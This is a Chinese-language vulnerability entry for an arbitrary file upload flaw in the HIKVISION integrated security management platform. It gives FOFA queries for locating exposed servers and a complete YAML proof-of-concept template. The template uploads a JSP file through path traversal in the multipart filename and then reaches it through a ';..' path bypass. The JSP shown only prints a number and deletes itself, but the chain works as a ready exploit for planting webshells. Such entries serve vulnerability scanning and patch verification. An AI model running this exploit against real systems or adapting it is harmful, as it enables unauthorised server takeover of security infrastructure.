漏洞描述
HiKVISION 综合安防管理平台 report接口存在任意文件上传漏洞,攻击者通过构造特殊的请求包可以上传任意文件,获取服务器权限
fofa: app="HIKVISION-综合安防管理平台"
fofa: title="综合安防管理平台"
hikvision-anfang-report-fileupload: HiKVISION 综合安防管理平台 report 任意文件上传
PoC代码[已公开]
id: hikvision-anfang-report-fileupload
info:
name: HiKVISION 综合安防管理平台 report 任意文件上传
author: zan8in
severity: critical
verified: true
description: |
HiKVISION 综合安防管理平台 report接口存在任意文件上传漏洞,攻击者通过构造特殊的请求包可以上传任意文件,获取服务器权限
fofa: app="HIKVISION-综合安防管理平台"
fofa: title="综合安防管理平台"
tags: hikvision,fileupload
created: 2023/08/09
set:
r1: randomLowercase(4)
r2: randomInt(40000, 44800)
r3: randomInt(40000, 44800)
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /svm/api/external/report
headers:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
body: "\
------WebKitFormBoundary{{rboundary}}\r\n\
Content-Disposition: form-data; name=\"file\"; filename=\"../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/{{r1}}.jsp\"\r\n\
Content-Type: application/zip\r\n\
\r\n\
<%out.print({{r2}} * {{r3}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%>\r\n\
\r\n\
------WebKitFormBoundary{{rboundary}}--\r\n\
"
expression: response.status == 200 && response.body.bcontains(b'"code":') && response.body.bcontains(b'"data":') && response.body.bcontains(b'"msg":')
r1:
request:
method: GET
path: /portal/ui/login/..;/..;/{{r1}}.jsp
expression: response.status == 200 && response.body.bcontains(bytes(string(r2 * r3)))
expression: r0() && r1()